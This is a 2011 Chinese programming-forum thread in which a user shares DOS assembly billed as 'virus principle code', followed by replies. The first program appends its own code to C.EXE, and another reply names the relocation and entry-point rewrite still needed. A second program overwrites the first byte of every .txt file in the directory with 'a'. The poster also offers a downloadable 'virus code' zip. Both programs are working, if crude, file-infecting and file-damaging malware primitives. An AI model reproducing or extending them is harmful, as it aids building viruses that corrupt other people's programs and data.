鱼C论坛

 找回密码
 立即注册
查看: 6068|回复: 22

[技术交流] 自己用汇编写的一段病毒原理代码

[复制链接]
发表于 2011-10-2 21:43:03 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
本帖最后由 柏柏 于 2011-11-5 16:04 编辑

  1. 这段代码就是复制自身代码的某段到别的程序尾部!! 我修改了此病毒!!
复制代码
                  更新中!往下看!下面有附件!!
  1. assume cs:code,ds:code
  2. code segment
  3. VirusStart:
  4. pop si
  5. start: jmp xc
  6. ;---------------------------------------------
  7. f_namea db 'C.EXE',0 ;f_namea 存放文件名称
  8. f_worda dw ?,0 ;f-worda 存放'文件内容!'
  9. f_hao dw ?,0 ;f_hao 存放句柄
  10. VirusLength equ VirusEnd-VirusStart
  11. ;-----------------------------------------------
  12. xc:
  13. mov ah,3dh ;打开文件
  14. mov dx,code
  15. mov ds,dx
  16. lea dx,f_namea
  17. mov al,2
  18. int 21h
  19. mov f_hao,ax ;这是AX文件句柄->给f_hao存放
  20. xwz:
  21. mov ah,42h ;移动文件指针
  22. mov al,2 ;到文件尾部
  23. mov bx,f_hao
  24. xor cx,cx
  25. xor dx,dx
  26. int 21h
  27. xw:
  28. mov ah,40h ;写入内容
  29. mov bx,f_hao ;把文件句柄给bx
  30. mov dx,si
  31. mov cx,VirusLength
  32. int 21h
  33. xend:
  34. mov ax,4c00h
  35. int 21h
  36. VirusEnd EQU $
  37. code ends
  38. end start
复制代码


                               
登录/注册后可看大图
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-2 22:27:43 | 显示全部楼层
强呀。。还是有些东西没看懂。。

顶你~~~
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-2 22:46:02 | 显示全部楼层
剩下的就是重定位,改写目标程序入口地址
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-3 02:10:29 | 显示全部楼层
好好学习,天天向上,支持鱼C,哦也!!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2011-10-3 08:32:36 | 显示全部楼层
本帖最后由 柏柏 于 2014-2-21 11:29 编辑

此病毒就 是 把自己程序代码复制到 目录下 C.EXE文件的尾部。
没有什么危害但是请慎用!!

                                             --2011年10月3 日

病毒代码.zip

404.64 KB, 下载次数: 62

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2011-10-3 08:42:42 | 显示全部楼层
也可以试验一下,把别的程序复制到目录下,再改为c.exe在运行下!!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2011-10-3 08:47:13 | 显示全部楼层
先把别的程序复到 病毒程序 目录下 再改名为C.exe
然后 在点击 c.exe 看看有什么效果


想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2011-10-3 10:07:05 | 显示全部楼层
本帖最后由 柏柏 于 2011-10-3 12:01 编辑

喜欢 就
                    喜欢

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-3 10:53:52 | 显示全部楼层
杀毒软件杀得动吗??
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2011-10-3 10:59:30 | 显示全部楼层
苍白の月 发表于 2011-10-3 10:53
杀毒软件杀得动吗??

恩,没有什么加密解密的,隐藏什么
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-3 12:53:03 | 显示全部楼层
{:1_1:}支持下,顶顶顶!!!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-4 14:33:02 | 显示全部楼层
嗯。。。大大的GOOD
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-4 19:43:14 | 显示全部楼层
支持一下把
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-4 23:13:07 From FishC Mobile | 显示全部楼层
很好,很强大,顶顶更强大!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-5 08:19:24 | 显示全部楼层
经典喜欢加油
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2011-10-5 14:05:32 | 显示全部楼层
本帖最后由 柏柏 于 2011-10-5 14:16 编辑

搜索代码:功能查找目录所有的[*。txt]文本文件 并在开头写入‘a’ 代码如下。不重复写入文件!!
  1. .model tiny
  2. .code
  3. ORG 100h
  4. start:
  5. ;========================
  6. a db ?,0
  7. bword db 'a',0
  8. fhao dw ?,0
  9. fname db '**.txt',0
  10. ;;========================
  11. mov ah,4Eh ;查找第一个文件
  12. mov dx,offset fname
  13. int 21h
  14. sloop:
  15. jc fend
  16. mov ax,3D02H  ;r/w 方式打开文件
  17. mov dx,9Eh        ;文件名存放在dta
  18. int 21h
  19. mov fhao,ax       ;文件句柄存放在fhao

  20. mov bx,fhao
  21. mov cx,1
  22. mov dx,offset a
  23. mov ax,3f00h ;读文件开头前1个字节 因为cx=1
  24. int 21h

  25. cmp WORD ptr [a],'a' ;比较当前打开文件开头如果写过久跳转
  26. je ft   ;跳转


  27. mov bx,fhao
  28. mov dx,offset bword
  29. mov cx,1
  30. mov ah,40h   ;写文件 文件内容为‘a’
  31. int 21h

  32. ; mov ah,3eh  ;关闭文件
  33. ; mov bx,fhao
  34. ; int 21h

  35. ft:
  36. mov ah,4Fh ;查找下一个文件
  37. int 21h
  38. jmp sloop
  39. fend: mov ax,4c00h
  40. int 21h

  41. end start
复制代码


想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-5 19:05:12 | 显示全部楼层
厉害!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-5 20:04:23 | 显示全部楼层
问下  这段代码有什么功能   可以让计算机死机蓝屏  还是关机重启不了   还是监控     盗号呢?
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-5 21:07:03 | 显示全部楼层
我是看不懂了 总之LZ比我强
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2011-10-6 08:44:24 | 显示全部楼层
嗜血灵异狂 发表于 2011-10-5 20:04
问下  这段代码有什么功能   可以让计算机死机蓝屏  还是关机重启不了   还是监控     盗号呢?

代码没有你说的这样!
代码前面有说明

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-5-27 08:42

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表